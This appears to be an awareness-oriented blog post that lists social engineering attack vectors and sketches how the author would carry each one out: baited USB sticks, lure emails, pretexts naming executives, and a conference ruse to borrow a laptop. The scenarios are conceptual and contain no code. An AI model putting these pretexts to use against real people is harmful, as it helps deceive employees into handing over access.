Top Social Engineering Attack Vectors
So, where do we research what the top attack vectors are? Who defines that? I started by grabbing one of the many, many sources:
https://us.norton.com/internetsecurity-emerging-threats-what-is-social-engineering.html
So according to this page the top vectors are:
- Baiting
- Phishing
- Email hacking and context spamming
- Pretexting
- Quid pro quo
- Vishing
Let’s shed some light onto each one of these to see what is what.
Baiting
You just leave something as a bait for the victim to fall for, for example, an USB stick in the parking lot. To make the bait more attractive, you could use additional labels like “accounting” or “confidential”.
Attack vector:
I would leave an USB stick with some interesting label “CEO” or “confidential” right near the entrance of the company. I would install a little script. Maybe I could discover beforehand which type of systems the employees use to optimize my auto-loader on the stick for that. If auto-run was not possible, I’d make the files as interesting as possible and maybe camouflage them as a picture or document.
Phishing / Spearphishing
Where I was born there is a group of historical traditionalists who call themselves the “Sohlnburger Büttpedder” (http://www.sohlnborger-buettpedder.de/). In a time when fishing was done without boats, they caught / killed fish by stomping on it and spearing it.
Today they “just” sing, so they mean no harm to animals anymore. Thank goodness.
So phishing attacks everyone with mail attacks asking for credentials etc. whereas spearphishing has one specific target who has been selected before the attack.
Email hacking and context spamming
Social engineers try to analyze who you would write emails with regularly. So they will try to pretend to be that person so they trick you into clicking that link having no security concerns.
How I would do it:
I know that editors of big news sites will most likely use a CMS. I would crawl the site for hints to that CMS. And then in my mails I would go like:
“Check what I found about QuickPublishSuperCMS! This is totally cool!” and plant a malicious link there.
Pretexting
You try to hook the victim with the help of a made-up story. I would guess this is the usual “somebody died and the relatives want to transfer all the money” mail you get from time to time.
How I would do it:
Maybe I would investigate the company structure via XING or LinkedIn and take out two important roles, preferably CEOs or CTOs. Then I would create a story around it about how I just met one of them and she or he asked me to send you the link. She or he was just off to the laundry and had no time or something…
So pretexting is pre-assembling the text specifically to the victim.
Quid pro quo
The attacker promises you something in exchange. “I give you this, you give me that.”
IT support calls you and promises to clean your machine from viruses. In exchange they ask you for login credentials.
Of course the attacker can now take over your machine and start further attacks.
Vishing
Is the same as phishing… but with a twist…
“V” is for voice.
So the same attack vectors that are valid for mail communication are tried verbally, preferably via phone.
Two more interesting common social engineering attacks
- Tailgating
- Watering hole
According to this page (in German):
Tailgating
An unknown person who doesn‘t belong to the company follows you through a secure door.
Or a person asks you if they could use your phone / computer for a while. Often for a simple task. Then they install malware / spyware.
On some external con: “Hey Sebastian, you are from SuperCorp, we met here before, right? You remember, last year! On that afterparty, you remember me? My MacBook can‘t open this presentation properly. All the formatting is broken. (No wonder, I manipulated the file, ehehehe…) May I use yours for a moment please?”
Who would say “no” to that. Be honest.
Better Call Saul (S04 E01): Social Engineering
Watch and learn. :) If you show confidence, there will be no doors for you anymore.
Watering Hole
The attacker waits on a website of which he knows that you use it frequently. Then he infects that website with malware. It’s like animals who go and drink on a watering hole from time to time.
Attack vector:
If the canteen of a big company had a website on the external internet, maybe the attacker would book a JavaScript ad banner there. As soon as you visit the website, your device gets infected.
Some questions that may spark the discussion about this topic in your company:
- Have you ever been victim to social engineering? Or do you know somebody who has?
- How would you attack your company? What would your vector be?
- What do you do to prevent these attacks?
- Have you already caught somebody who tried a social engineering attack on you or your company?
- Do you teach people to recognize those attacks? How?
